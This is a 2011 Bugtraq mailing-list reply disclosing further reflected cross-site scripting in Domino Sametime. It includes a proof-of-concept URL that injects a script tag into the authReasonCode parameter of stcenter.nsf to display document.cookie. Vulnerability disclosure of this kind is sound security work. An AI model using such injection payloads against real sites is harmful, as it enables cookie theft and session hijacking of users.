Bugtraq mailing list archives

Re: Domino Sametime Multiple Reflected Cross-Site Scripting


From: barkley () usa net
Date: Tue, 22 Feb 2011 06:08:15 -0700

Hi,


I discovered similar XSS affecting Domino Sametime some time ago...

This XSS affects other scripts also... 

i.e. stcenter.nsf

Here's an example:

/stcenter.nsf?OpenDatabase&authReasonCode="><script>alert(document.cookie);</script>"


Cheers

Andrew


Current thread: